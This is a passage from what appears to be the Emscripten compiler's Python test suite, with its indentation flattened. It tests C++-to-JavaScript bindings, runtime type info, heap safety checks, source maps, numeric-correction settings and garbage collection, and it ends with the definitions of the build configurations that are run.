generated = open('src.cpp.o.js').read()
assert 'jsCall' not in generated
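# (With zero reserved slots, addFunction has no free function-table entry
# to hand out in asm.js mode, hence the error asserted above; the absence
# of 'jsCall' trampolines in the generated code confirms no slots were
# emitted. The flip below re-runs the working case under the other
# ALIASING_FUNCTION_POINTERS table layout.)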
Settings.RESERVED_FUNCTION_POINTERS = 1
Settings.ALIASING_FUNCTION_POINTERS = 1 - Settings.ALIASING_FUNCTION_POINTERS # flip the test
self.do_run(src, '''Hello 7 from JS!''')
def test_embind(self):
if self.emcc_args is None: return self.skip('requires emcc')
Building.COMPILER_TEST_OPTS += ['--bind']
src = r'''
#include<stdio.h>
#include<emscripten/val.h>
using namespace emscripten;
int main() {
val Math = val::global("Math");
// two ways to call Math.abs
printf("abs(-10): %d\n", Math.call<int>("abs", -10));
printf("abs(-11): %d\n", Math["abs"](-11).as<int>());
return 0;
}
'''
self.do_run(src, 'abs(-10): 10\nabs(-11): 11')
def test_scriptaclass(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.EXPORT_BINDINGS = 1
header_filename = os.path.join(self.get_dir(), 'header.h')
header = '''
struct ScriptMe {
int value;
ScriptMe(int val);
int getVal(); // XXX Sadly, inlining these will result in LLVM not
// producing any code for them (when just building
// as a library)
void mulVal(int mul);
};
'''
h = open(header_filename, 'w')
h.write(header)
h.close()
src = '''
#include "header.h"
ScriptMe::ScriptMe(int val) : value(val) { }
int ScriptMe::getVal() { return value; }
void ScriptMe::mulVal(int mul) { value *= mul; }
'''
# Way 1: use demangler and namespacer
script_src = '''
var sme = Module._.ScriptMe.__new__(83); // malloc(sizeof(ScriptMe)), ScriptMe::ScriptMe(sme, 83) / new ScriptMe(83) (at addr sme)
Module._.ScriptMe.mulVal(sme, 2); // ScriptMe::mulVal(sme, 2) sme.mulVal(2)
Module.print('*' + Module._.ScriptMe.getVal(sme) + '*');
_free(sme);
Module.print('*ok*');
'''
post = '''
def process(filename):
Popen([PYTHON, DEMANGLER, filename], stdout=open(filename + '.tmp', 'w')).communicate()
Popen([PYTHON, NAMESPACER, filename, filename + '.tmp'], stdout=open(filename + '.tmp2', 'w')).communicate()
src = open(filename, 'r').read().replace(
'// {{MODULE_ADDITIONS}',
'Module["_"] = ' + open(filename + '.tmp2', 'r').read().replace('var ModuleNames = ', '').rstrip() + ';\n\n' + script_src + '\n\n' +
'// {{MODULE_ADDITIONS}'
)
open(filename, 'w').write(src)
'''
# XXX disable due to possible v8 bug -- self.do_run(src, '*166*\n*ok*', post_build=post)
if self.emcc_args is not None and '-O2' in self.emcc_args and 'ASM_JS=0' not in self.emcc_args: # without asm, closure minifies Math.imul badly
self.emcc_args += ['--closure', '1'] # Use closure here, to test we export things right
# Way 2: use CppHeaderParser
Settings.RUNTIME_TYPE_INFO = 1
header = '''
#include <stdio.h>
class Parent {
protected:
int value;
public:
Parent(int val);
Parent(Parent *p, Parent *q); // overload constructor
int getVal() { return value; }; // inline should work just fine here, unlike Way 1 before
void mulVal(int mul);
};
class Child1 : public Parent {
public:
Child1() : Parent(7) { printf("Child1:%d\\n", value); };
Child1(int val) : Parent(val*2) { value -= 1; printf("Child1:%d\\n", value); };
int getValSqr() { return value*value; }
int getValSqr(int more) { return value*value*more; }
int getValTimes(int times=1) { return value*times; }
};
class Child2 : public Parent {
public:
Child2() : Parent(9) { printf("Child2:%d\\n", value); };
int getValCube() { return value*value*value; }
static void printStatic() { printf("*static*\\n"); }
virtual void virtualFunc() { printf("*virtualf*\\n"); }
virtual void virtualFunc2() { printf("*virtualf2*\\n"); }
static void runVirtualFunc(Child2 *self) { self->virtualFunc(); };
private:
void doSomethingSecret() { printf("security breached!\\n"); }; // we should not be able to do this
};
'''
open(header_filename, 'w').write(header)
basename = os.path.join(self.get_dir(), 'bindingtest')
output = Popen([PYTHON, BINDINGS_GENERATOR, basename, header_filename], stdout=PIPE, stderr=self.stderr_redirect).communicate()[0]
#print output
assert 'Traceback' not in output, 'Failure in binding generation: ' + output
src = '''
#include "header.h"
Parent::Parent(int val) : value(val) { printf("Parent:%d\\n", val); }
Parent::Parent(Parent *p, Parent *q) : value(p->value + q->value) { printf("Parent:%d\\n", value); }
void Parent::mulVal(int mul) { value *= mul; }
#include "bindingtest.cpp"
'''
post2 = '''
def process(filename):
src = open(filename, 'a')
src.write(open('bindingtest.js').read() + '\\n\\n')
src.close()
'''
def post3(filename):
script_src_2 = '''
var sme = new Module.Parent(42);
sme.mulVal(2);
Module.print('*')
Module.print(sme.getVal());
Module.print('c1');
var c1 = new Module.Child1();
Module.print(c1.getVal());
c1.mulVal(2);
Module.print(c1.getVal());
Module.print(c1.getValSqr());
Module.print(c1.getValSqr(3));
Module.print(c1.getValTimes()); // default argument should be 1
Module.print(c1.getValTimes(2));
Module.print('c1 v2');
c1 = new Module.Child1(8); // now with a parameter, we should handle the overloading automatically and properly and use constructor #2
Module.print(c1.getVal());
c1.mulVal(2);
Module.print(c1.getVal());
Module.print(c1.getValSqr());
Module.print(c1.getValSqr(3));
Module.print('c2')
var c2 = new Module.Child2();
Module.print(c2.getVal());
c2.mulVal(2);
Module.print(c2.getVal());
Module.print(c2.getValCube());
var succeeded;
try {
succeeded = 0;
Module.print(c2.doSomethingSecret()); // should fail since private
succeeded = 1;
} catch(e) {}
Module.print(succeeded);
try {
succeeded = 0;
Module.print(c2.getValSqr()); // function from the other class
succeeded = 1;
} catch(e) {}
Module.print(succeeded);
try {
succeeded = 0;
c2.getValCube(); // sanity
succeeded = 1;
} catch(e) {}
Module.print(succeeded);
Module.Child2.prototype.printStatic(); // static calls go through the prototype
// virtual function
c2.virtualFunc();
Module.Child2.prototype.runVirtualFunc(c2);
c2.virtualFunc2();
// extend the class from JS
var c3 = new Module.Child2;
Module.customizeVTable(c3, [{
original: Module.Child2.prototype.virtualFunc,
replacement: function() {
Module.print('*js virtualf replacement*');
}
}, {
original: Module.Child2.prototype.virtualFunc2,
replacement: function() {
Module.print('*js virtualf2 replacement*');
}
}]);
c3.virtualFunc();
Module.Child2.prototype.runVirtualFunc(c3);
c3.virtualFunc2();
c2.virtualFunc(); // original should remain the same
Module.Child2.prototype.runVirtualFunc(c2);
c2.virtualFunc2();
Module.print('*ok*');
'''
src = open(filename, 'a')
src.write(script_src_2 + '\n')
src.close()
Settings.RESERVED_FUNCTION_POINTERS = 20
self.do_run(src, '''*
84
c1
Parent:7
Child1:7
7
14
196
588
14
28
c1 v2
Parent:16
Child1:15
15
30
900
2700
c2
Parent:9
Child2:9
9
18
5832
0
0
1
*static*
*virtualf*
*virtualf*
*virtualf2*''' + ('''
Parent:9
Child2:9
*js virtualf replacement*
*js virtualf replacement*
*js virtualf2 replacement*
*virtualf*
*virtualf*
*virtualf2*''') + '''
*ok*
''', post_build=(post2, post3))
def test_scriptaclass_2(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.EXPORT_BINDINGS = 1
header_filename = os.path.join(self.get_dir(), 'header.h')
header = '''
#include <stdio.h>
#include <string.h>
class StringUser {
char *s;
int i;
public:
StringUser(char *string, int integer) : s(strdup(string)), i(integer) {}
void Print(int anotherInteger, char *anotherString) {
printf("|%s|%d|%s|%d|\\n", s, i, anotherString, anotherInteger);
}
void CallOther(StringUser *fr) { fr->Print(i, s); }
};
'''
open(header_filename, 'w').write(header)
basename = os.path.join(self.get_dir(), 'bindingtest')
output = Popen([PYTHON, BINDINGS_GENERATOR, basename, header_filename], stdout=PIPE, stderr=self.stderr_redirect).communicate()[0]
#print output
assert 'Traceback' not in output, 'Failure in binding generation: ' + output
src = '''
#include "header.h"
#include "bindingtest.cpp"
'''
post = '''
def process(filename):
src = open(filename, 'a')
src.write(open('bindingtest.js').read() + '\\n\\n')
src.write(\'\'\'
var user = new Module.StringUser("hello", 43);
user.Print(41, "world");
\'\'\')
src.close()
'''
self.do_run(src, '|hello|43|world|41|', post_build=post)
def test_typeinfo(self):
if self.emcc_args is not None and self.emcc_args != []: return self.skip('full LLVM opts optimize out all the code that uses the type')
Settings.RUNTIME_TYPE_INFO = 1
if Settings.QUANTUM_SIZE != 4: return self.skip('We assume normal sizes in the output here')
src = '''
#include<stdio.h>
struct UserStruct {
int x;
char y;
short z;
};
struct Encloser {
short x;
UserStruct us;
int y;
};
int main() {
Encloser e;
e.us.y = 5;
printf("*ok:%d*\\n", e.us.y);
return 0;
}
'''
post = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{POST_RUN_ADDITIONS}}',
\'\'\'
if (Runtime.typeInfo) {
Module.print('|' + Runtime.typeInfo.UserStruct.fields + '|' + Runtime.typeInfo.UserStruct.flatIndexes + '|');
var t = Runtime.generateStructInfo(['x', { us: ['x', 'y', 'z'] }, 'y'], 'Encloser')
Module.print('|' + [t.x, t.us.x, t.us.y, t.us.z, t.y] + '|');
Module.print('|' + JSON.stringify(Runtime.generateStructInfo(['x', 'y', 'z'], 'UserStruct')) + '|');
} else {
Module.print('No type info.');
}
\'\'\'
)
open(filename, 'w').write(src)
'''
self.do_run(src,
'*ok:5*\n|i32,i8,i16|0,4,6|\n|0,4,8,10,12|\n|{"__size__":8,"x":0,"y":4,"z":6}|',
post_build=post)
# Make sure that without the setting, we don't spam the .js with the type info
Settings.RUNTIME_TYPE_INFO = 0
self.do_run(src, 'No type info.', post_build=post)
### Tests for tools
def test_safe_heap(self):
if not Settings.SAFE_HEAP: return self.skip('We need SAFE_HEAP to test SAFE_HEAP')
if Settings.USE_TYPED_ARRAYS == 2: return self.skip('It is ok to violate the load-store assumption with TA2')
if Building.LLVM_OPTS: return self.skip('LLVM can optimize away the intermediate |x|')
src = '''
#include<stdio.h>
#include<stdlib.h>
int main() { int *x = (int*)malloc(sizeof(int));
*x = 20;
float *y = (float*)x;
printf("%f\\n", *y);
printf("*ok*\\n");
return 0;
}
'''
try:
self.do_run(src, '*nothingatall*')
except Exception, e:
# This test *should* fail, by throwing this exception
assert 'Assertion failed: Load-store consistency assumption failure!' in str(e), str(e)
# And we should not fail if we disable checking on that line
Settings.SAFE_HEAP = 3
Settings.SAFE_HEAP_LINES = ["src.cpp:7"]
self.do_run(src, '*ok*')
# But if we disable the wrong lines, we still fail
Settings.SAFE_HEAP_LINES = ["src.cpp:99"]
try:
self.do_run(src, '*nothingatall*')
except Exception, e:
# This test *should* fail, by throwing this exception
assert 'Assertion failed: Load-store consistency assumption failure!' in str(e), str(e)
# And reverse the checks with = 2
Settings.SAFE_HEAP = 2
Settings.SAFE_HEAP_LINES = ["src.cpp:99"]
self.do_run(src, '*ok*')
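# Recap of the SAFE_HEAP modes exercised above: 1 checks every line,
# 3 checks everywhere except the lines listed in SAFE_HEAP_LINES, and
# 2 checks only the listed lines.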
Settings.SAFE_HEAP = 1
# Linking multiple files should work too
module = '''
#include<stdio.h>
#include<stdlib.h>
void callFunc() { int *x = (int*)malloc(sizeof(int));
*x = 20;
float *y = (float*)x;
printf("%f\\n", *y);
}
'''
module_name = os.path.join(self.get_dir(), 'module.cpp')
open(module_name, 'w').write(module)
main = '''
#include<stdio.h>
#include<stdlib.h>
extern void callFunc();
int main() { callFunc();
int *x = (int*)malloc(sizeof(int));
*x = 20;
float *y = (float*)x;
printf("%f\\n", *y);
printf("*ok*\\n");
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.cpp')
open(main_name, 'w').write(main)
Building.emcc(module_name, ['-g'])
Building.emcc(main_name, ['-g'])
all_name = os.path.join(self.get_dir(), 'all.bc')
Building.link([module_name + '.o', main_name + '.o'], all_name)
try:
self.do_ll_run(all_name, '*nothingatall*')
except Exception, e:
# This test *should* fail, by throwing this exception
assert 'Assertion failed: Load-store consistency assumption failure!' in str(e), str(e)
# And we should not fail if we disable checking on those lines
Settings.SAFE_HEAP = 3
Settings.SAFE_HEAP_LINES = ["module.cpp:7", "main.cpp:9"]
self.do_ll_run(all_name, '*ok*')
# But we will fail if we do not disable exactly what we need to - any mistake leads to error
for lines in [["module.cpp:22", "main.cpp:9"], ["module.cpp:7", "main.cpp:29"], ["module.cpp:127", "main.cpp:449"], ["module.cpp:7"], ["main.cpp:9"]]:
Settings.SAFE_HEAP_LINES = lines
try:
self.do_ll_run(all_name, '*nothingatall*')
except Exception, e:
# This test *should* fail, by throwing this exception
assert 'Assertion failed: Load-store consistency assumption failure!' in str(e), str(e)
def test_debug(self):
if '-g' not in Building.COMPILER_TEST_OPTS: Building.COMPILER_TEST_OPTS.append('-g')
if self.emcc_args is not None:
if '-O1' in self.emcc_args or '-O2' in self.emcc_args: return self.skip('optimizations remove LLVM debug info')
src = '''
#include <stdio.h>
#include <assert.h>
void checker(int x) {
x += 20;
assert(x < 15); // this is line 7!
}
int main() {
checker(10);
return 0;
}
'''
try:
self.do_run(src, '*nothingatall*')
except Exception, e:
# This test *should* fail
assert 'Assertion failed: x < 15' in str(e), str(e)
lines = open('src.cpp.o.js', 'r').readlines()
lines = filter(lambda line: '___assert_fail(' in line or '___assert_func(' in line, lines)
found_line_num = any(('//@line 7 "' in line) for line in lines)
found_filename = any(('src.cpp"\n' in line) for line in lines)
assert found_line_num, 'Must have debug info with the line number'
assert found_filename, 'Must have debug info with the filename'
def test_source_map(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip("doesn't pass without typed arrays")
if NODE_JS not in JS_ENGINES: return self.skip('sourcemapper requires Node to run')
if '-g' not in Building.COMPILER_TEST_OPTS: Building.COMPILER_TEST_OPTS.append('-g')
src = '''
#include <stdio.h>
#include <assert.h>
__attribute__((noinline)) int foo() {
printf("hi"); // line 6
return 1; // line 7
}
int main() {
printf("%d", foo()); // line 11
return 0; // line 12
}
'''
dirname = self.get_dir()
src_filename = os.path.join(dirname, 'src.cpp')
out_filename = os.path.join(dirname, 'a.out.js')
no_maps_filename = os.path.join(dirname, 'no-maps.out.js')
with open(src_filename, 'w') as f: f.write(src)
assert '-g4' not in Building.COMPILER_TEST_OPTS
Building.emcc(src_filename, Settings.serialize() + self.emcc_args +
Building.COMPILER_TEST_OPTS, out_filename)
# the file name may find its way into the generated code, so make sure we
# can do an apples-to-apples comparison by compiling with the same file name
shutil.move(out_filename, no_maps_filename)
with open(no_maps_filename) as f: no_maps_file = f.read()
no_maps_file = re.sub(' *//@.*$', '', no_maps_file, flags=re.MULTILINE)
Building.COMPILER_TEST_OPTS.append('-g4')
def build_and_check():
import json
Building.emcc(src_filename, Settings.serialize() + self.emcc_args +
Building.COMPILER_TEST_OPTS, out_filename, stderr=PIPE)
with open(out_filename) as f: out_file = f.read()
# after removing the @line and @sourceMappingURL comments, the build
# result should be identical to the non-source-mapped debug version.
# this is worth checking because the parser AST swaps strings for token
# objects when generating source maps, so we want to make sure the
# optimizer can deal with both types.
out_file = re.sub(' *//@.*$', '', out_file, flags=re.MULTILINE)
def clean(code):
return code.replace('{\n}', '{}')
self.assertIdentical(clean(no_maps_file), clean(out_file))
map_filename = out_filename + '.map'
data = json.load(open(map_filename, 'r'))
self.assertIdentical(out_filename, data['file'])
self.assertIdentical(src_filename, data['sources'][0])
self.assertIdentical(src, data['sourcesContent'][0])
mappings = json.loads(jsrun.run_js(
path_from_root('tools', 'source-maps', 'sourcemap2json.js'),
tools.shared.NODE_JS, [map_filename]))
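# sourcemap2json.js decodes the VLQ 'mappings' field into dicts of the
# rough shape {'source': ..., 'originalLine': N, 'generatedLine': M},
# which is the structure the checks here and in test_exception_source_map
# rely on.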
seen_lines = set()
for m in mappings:
self.assertIdentical(src_filename, m['source'])
seen_lines.add(m['originalLine'])
# ensure that all the 'meaningful' lines in the original code get mapped
assert seen_lines.issuperset([6, 7, 11, 12])
# EMCC_DEBUG=2 causes lots of intermediate files to be written, and so
# serves as a stress test for source maps because it needs to correlate
# line numbers across all those files.
old_emcc_debug = os.environ.get('EMCC_DEBUG', None)
os.environ.pop('EMCC_DEBUG', None)
try:
build_and_check()
os.environ['EMCC_DEBUG'] = '2'
build_and_check()
finally:
if old_emcc_debug is not None:
os.environ['EMCC_DEBUG'] = old_emcc_debug
else:
os.environ.pop('EMCC_DEBUG', None)
def test_exception_source_map(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip("doesn't pass without typed arrays")
if '-g4' not in Building.COMPILER_TEST_OPTS: Building.COMPILER_TEST_OPTS.append('-g4')
if NODE_JS not in JS_ENGINES: return self.skip('sourcemapper requires Node to run')
src = '''
#include <stdio.h>
__attribute__((noinline)) void foo(int i) {
if (i < 10) throw i; // line 5
}
int main() {
int i;
scanf("%d", &i);
foo(i);
return 0;
}
'''
def post(filename):
import json
map_filename = filename + '.map'
mappings = json.loads(jsrun.run_js(
path_from_root('tools', 'source-maps', 'sourcemap2json.js'),
tools.shared.NODE_JS, [map_filename]))
with open(filename) as f: lines = f.readlines()
for m in mappings:
if m['originalLine'] == 5 and '__cxa_throw' in lines[m['generatedLine']]:
return
assert False, 'Must label throw statements with line numbers'
dirname = self.get_dir()
self.build(src, dirname, os.path.join(dirname, 'src.cpp'), post_build=(None, post))
def test_linespecific(self):
if Settings.ASM_JS: return self.skip('asm always has corrections on')
if '-g' not in Building.COMPILER_TEST_OPTS: Building.COMPILER_TEST_OPTS.append('-g')
if self.emcc_args:
self.emcc_args += ['--llvm-opts', '0'] # llvm full opts make the expected failures here not happen
Building.COMPILER_TEST_OPTS += ['--llvm-opts', '0']
Settings.CHECK_SIGNS = 0
Settings.CHECK_OVERFLOWS = 0
# Signs
src = '''
#include <stdio.h>
#include <assert.h>
int main()
{
int varey = 100;
unsigned int MAXEY = -1;
printf("*%d*\\n", varey >= MAXEY); // 100 >= -1? not in unsigned!
}
'''
Settings.CORRECT_SIGNS = 0
self.do_run(src, '*1*') # This is a fail - we expect 0
Settings.CORRECT_SIGNS = 1
self.do_run(src, '*0*') # Now it will work properly
# And now let's fix just that one line
Settings.CORRECT_SIGNS = 2
Settings.CORRECT_SIGNS_LINES = ["src.cpp:9"]
self.do_run(src, '*0*')
# Fixing the wrong line should not work
Settings.CORRECT_SIGNS = 2
Settings.CORRECT_SIGNS_LINES = ["src.cpp:3"]
self.do_run(src, '*1*')
# And reverse the checks with = 2
Settings.CORRECT_SIGNS = 3
Settings.CORRECT_SIGNS_LINES = ["src.cpp:3"]
self.do_run(src, '*0*')
Settings.CORRECT_SIGNS = 3
Settings.CORRECT_SIGNS_LINES = ["src.cpp:9"]
self.do_run(src, '*1*')
Settings.CORRECT_SIGNS = 0
# Overflows
src = '''
#include<stdio.h>
int main() {
int t = 77;
for (int i = 0; i < 30; i++) {
t = t + t + t + t + t + 1;
}
printf("*%d,%d*\\n", t, t & 127);
return 0;
}
'''
correct = '*186854335,63*'
Settings.CORRECT_OVERFLOWS = 0
try:
self.do_run(src, correct)
raise Exception('UNEXPECTED-PASS')
except Exception, e:
assert 'UNEXPECTED' not in str(e), str(e)
assert 'Expected to find' in str(e), str(e)
Settings.CORRECT_OVERFLOWS = 1
self.do_run(src, correct) # Now it will work properly
# And now let's fix just that one line
Settings.CORRECT_OVERFLOWS = 2
Settings.CORRECT_OVERFLOWS_LINES = ["src.cpp:6"]
self.do_run(src, correct)
# Fixing the wrong line should not work
Settings.CORRECT_OVERFLOWS = 2
Settings.CORRECT_OVERFLOWS_LINES = ["src.cpp:3"]
try:
self.do_run(src, correct)
raise Exception('UNEXPECTED-PASS')
except Exception, e:
assert 'UNEXPECTED' not in str(e), str(e)
assert 'Expected to find' in str(e), str(e)
# And reverse the checks with = 2
Settings.CORRECT_OVERFLOWS = 3
Settings.CORRECT_OVERFLOWS_LINES = ["src.cpp:3"]
self.do_run(src, correct)
Settings.CORRECT_OVERFLOWS = 3
Settings.CORRECT_OVERFLOWS_LINES = ["src.cpp:6"]
try:
self.do_run(src, correct)
raise Exception('UNEXPECTED-PASS')
except Exception, e:
assert 'UNEXPECTED' not in str(e), str(e)
assert 'Expected to find' in str(e), str(e)
Settings.CORRECT_OVERFLOWS = 0
# Roundings
src = '''
#include <stdio.h>
#include <assert.h>
int main()
{
TYPE x = -5;
printf("*%d*", x/2);
x = 5;
printf("*%d*", x/2);
float y = -5.33;
x = y;
printf("*%d*", x);
y = 5.33;
x = y;
printf("*%d*", x);
printf("\\n");
}
'''
if Settings.USE_TYPED_ARRAYS != 2: # the errors here are very specific to non-i64 mode 1
Settings.CORRECT_ROUNDINGS = 0
self.do_run(src.replace('TYPE', 'long long'), '*-3**2**-6**5*') # JS floor operations, always to the negative. This is an undetected error here!
self.do_run(src.replace('TYPE', 'int'), '*-2**2**-5**5*') # We get these right, since they are 32-bit and we can shortcut using the |0 trick
self.do_run(src.replace('TYPE', 'unsigned int'), '*-2**2**-6**5*')
Settings.CORRECT_ROUNDINGS = 1
Settings.CORRECT_SIGNS = 1 # To be correct here, we need sign corrections as well
self.do_run(src.replace('TYPE', 'long long'), '*-2**2**-5**5*') # Correct
self.do_run(src.replace('TYPE', 'int'), '*-2**2**-5**5*') # Correct
self.do_run(src.replace('TYPE', 'unsigned int'), '*2147483645**2**-5**5*') # Correct
Settings.CORRECT_SIGNS = 0
if Settings.USE_TYPED_ARRAYS != 2: # the errors here are very specific to non-i64 mode 1
Settings.CORRECT_ROUNDINGS = 2
Settings.CORRECT_ROUNDINGS_LINES = ["src.cpp:13"] # Fix just the last mistake
self.do_run(src.replace('TYPE', 'long long'), '*-3**2**-5**5*')
self.do_run(src.replace('TYPE', 'int'), '*-2**2**-5**5*') # Here we are lucky and also get the first one right
self.do_run(src.replace('TYPE', 'unsigned int'), '*-2**2**-5**5*')
# And reverse the check with = 2
if Settings.USE_TYPED_ARRAYS != 2: # the errors here are very specific to non-i64 mode 1
Settings.CORRECT_ROUNDINGS = 3
Settings.CORRECT_ROUNDINGS_LINES = ["src.cpp:999"]
self.do_run(src.replace('TYPE', 'long long'), '*-2**2**-5**5*')
self.do_run(src.replace('TYPE', 'int'), '*-2**2**-5**5*')
Settings.CORRECT_SIGNS = 1 # To be correct here, we need sign corrections as well
self.do_run(src.replace('TYPE', 'unsigned int'), '*2147483645**2**-5**5*')
Settings.CORRECT_SIGNS = 0
def test_exit_status(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
static void cleanup() {
printf("cleanup\n");
}
int main()
{
atexit(cleanup); // this atexit should still be called
printf("hello, world!\n");
exit(118); // Unusual exit status to make sure it's working!
}
'''
self.do_run(src, 'hello, world!\ncleanup\nExit Status: 118')
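# A minimal sketch (hypothetical helper, not part of the suite) of pulling the
# numeric status back out of the 'Exit Status: N' line checked above:
import re
def parse_exit_status(output):
  m = re.search(r'Exit Status: (\d+)', output)
  return int(m.group(1)) if m else None
assert parse_exit_status('hello, world!\ncleanup\nExit Status: 118') == 118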
def test_gc(self):
if self.emcc_args == None: return self.skip('needs ta2')
if Settings.ASM_JS: return self.skip('asm cannot support generic function table')
Settings.GC_SUPPORT = 1
src = r'''
#include <stdio.h>
#include <gc.h>
#include <assert.h>
void *global;
void finalizer(void *ptr, void *arg) {
printf("finalizing %d (global == %d)\n", (int)arg, ptr == global);
}
void finalizer2(void *ptr, void *arg) {
printf("finalizing2 %d (global == %d)\n", (int)arg, ptr == global);
}
int main() {
GC_INIT();
void *local, *local2, *local3, *local4, *local5, *local6;
// Hold on to global, drop locals
global = GC_MALLOC(1024); // rooted since in a static allocation
GC_REGISTER_FINALIZER_NO_ORDER(global, finalizer, 0, 0, 0);
printf("alloc %p\n", global);
local = GC_MALLOC(1024); // not rooted since stack is not scanned
GC_REGISTER_FINALIZER_NO_ORDER(local, finalizer, (void*)1, 0, 0);
printf("alloc %p\n", local);
assert((char*)local - (char*)global >= 1024 || (char*)global - (char*)local >= 1024);
local2 = GC_MALLOC(1024); // no finalizer
printf("alloc %p\n", local2);
local3 = GC_MALLOC(1024); // with finalizable2
GC_REGISTER_FINALIZER_NO_ORDER(local3, finalizer2, (void*)2, 0, 0);
printf("alloc %p\n", local);
local4 = GC_MALLOC(1024); // yet another
GC_REGISTER_FINALIZER_NO_ORDER(local4, finalizer2, (void*)3, 0, 0);
printf("alloc %p\n", local);
printf("basic test\n");
GC_FORCE_COLLECT();
printf("*\n");
GC_FREE(global); // force free will actually work
// scanning inside objects
global = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(global, finalizer, 0, 0, 0);
local = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local, finalizer, (void*)1, 0, 0);
local2 = GC_MALLOC_ATOMIC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local2, finalizer, (void*)2, 0, 0);
local3 = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local3, finalizer, (void*)3, 0, 0);
local4 = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local4, finalizer, (void*)4, 0, 0);
local5 = GC_MALLOC_UNCOLLECTABLE(12);
// This should never trigger since local5 is uncollectable
GC_REGISTER_FINALIZER_NO_ORDER(local5, finalizer, (void*)5, 0, 0);
printf("heap size = %d\n", GC_get_heap_size());
local4 = GC_REALLOC(local4, 24);
printf("heap size = %d\n", GC_get_heap_size());
local6 = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local6, finalizer, (void*)6, 0, 0);
// This should be the same as a free
GC_REALLOC(local6, 0);
void **globalData = (void**)global;
globalData[0] = local;
globalData[1] = local2;
void **localData = (void**)local;
localData[0] = local3;
void **local2Data = (void**)local2;
local2Data[0] = local4; // actually ignored, because local2 is atomic, so 4 is freeable
printf("object scan test test\n");
GC_FORCE_COLLECT();
printf("*\n");
GC_FREE(global); // force free will actually work
printf("*\n");
GC_FORCE_COLLECT();
printf(".\n");
global = 0;
return 0;
}
'''
self.do_run(src, '''basic test
finalizing 1 (global == 0)
finalizing2 2 (global == 0)
finalizing2 3 (global == 0)
*
finalizing 0 (global == 1)
heap size = 72
heap size = 84
finalizing 6 (global == 0)
object scan test test
finalizing 4 (global == 0)
*
finalizing 0 (global == 1)
*
finalizing 1 (global == 0)
finalizing 2 (global == 0)
finalizing 3 (global == 0)
.
''')
# Generate tests for everything
def make_run(fullname, name=-1, compiler=-1, embetter=0, quantum_size=0,
typed_arrays=0, emcc_args=None, env=None):
if env is None: env = {}
TT = type(fullname, (T,), dict(run_name = fullname, env = env))
def tearDown(self):
super(TT, self).tearDown()
for k, v in self.env.iteritems():
del os.environ[k]
TT.tearDown = tearDown
def setUp(self):
super(TT, self).setUp()
for k, v in self.env.iteritems():
assert k not in os.environ, k + ' should not be in environment'
os.environ[k] = v
global checked_sanity
if not checked_sanity:
print '(checking sanity from test runner)' # do this after we set env stuff
check_sanity(force=True)
checked_sanity = True
Building.COMPILER_TEST_OPTS = ['-g']
os.chdir(self.get_dir()) # Ensure the directory exists and go there
Building.COMPILER = compiler
self.emcc_args = None if emcc_args is None else emcc_args[:]
if self.emcc_args is not None:
Settings.load(self.emcc_args)
Building.LLVM_OPTS = 0
if '-O2' in self.emcc_args:
Building.COMPILER_TEST_OPTS = [] # remove -g in -O2 tests, for more coverage
#Building.COMPILER_TEST_OPTS += self.emcc_args
for arg in self.emcc_args:
if arg.startswith('-O'):
Building.COMPILER_TEST_OPTS.append(arg) # so bitcode is optimized too, this is for cpp to ll
else:
try:
key, value = arg.split('=')
Settings[key] = value # forward -s K=V
except:
pass
return
# TODO: Move much of these to a init() function in shared.py, and reuse that
Settings.USE_TYPED_ARRAYS = typed_arrays
Settings.INVOKE_RUN = 1
Settings.RELOOP = 0 # we only do them in the "o2" pass
Settings.MICRO_OPTS = embetter
Settings.QUANTUM_SIZE = quantum_size
Settings.ASSERTIONS = 1-embetter
Settings.SAFE_HEAP = 1-embetter
Settings.CHECK_OVERFLOWS = 1-embetter
Settings.CORRECT_OVERFLOWS = 1-embetter
Settings.CORRECT_SIGNS = 0
Settings.CORRECT_ROUNDINGS = 0
Settings.CORRECT_OVERFLOWS_LINES = Settings.CORRECT_SIGNS_LINES = Settings.CORRECT_ROUNDINGS_LINES = Settings.SAFE_HEAP_LINES = []
Settings.CHECK_SIGNS = 0 #1-embetter
Settings.RUNTIME_TYPE_INFO = 0
Settings.DISABLE_EXCEPTION_CATCHING = 0
Settings.INCLUDE_FULL_LIBRARY = 0
Settings.BUILD_AS_SHARED_LIB = 0
Settings.RUNTIME_LINKED_LIBS = []
Settings.EMULATE_UNALIGNED_ACCESSES = int(Settings.USE_TYPED_ARRAYS == 2 and Building.LLVM_OPTS == 2)
Settings.DOUBLE_MODE = 1 if Settings.USE_TYPED_ARRAYS and Building.LLVM_OPTS == 0 else 0
Settings.PRECISE_I64_MATH = 0
Settings.NAMED_GLOBALS = 0 if not embetter else 1
TT.setUp = setUp
return TT
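# make_run uses type(name, bases, dict) to stamp out one test class per
# configuration. A self-contained sketch of that technique (the names here are
# illustrative only):
class _Base(object):
  greeting = 'hi'
  def greet(self):
    return '%s from %s' % (self.greeting, self.run_name)
_Derived = type('_Derived', (_Base,), dict(run_name='custom', greeting='hello'))
assert _Derived().greet() == 'hello from custom'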
# Make one run with the defaults
default = make_run("default", compiler=CLANG, emcc_args=[])
# Make one run with -O1, with safe heap
o1 = make_run("o1", compiler=CLANG, emcc_args=["-O1", "-s", "ASM_JS=0", "-s", "SAFE_HEAP=1"])
# Make one run with -O2, but without closure (we enable closure in specific tests, otherwise on everything it is too slow)
o2 = make_run("o2", compiler=CLANG, emcc_args=["-O2", "-s", "ASM_JS=0", "-s", "JS_CHUNK_SIZE=1024"])
# asm.js
asm1 = make_run("asm1", compiler=CLANG, emcc_args=["-O1", "-s", "CHECK_HEAP_ALIGN=1"])
asm2 = make_run("asm2", compiler=CLANG, emcc_args=["-O2"])
asm2g = make_run("asm2g", compiler=CLANG, emcc_args=["-O2", "-g", "-s", "ASSERTIONS=1", "--memory-init-file", "1"])
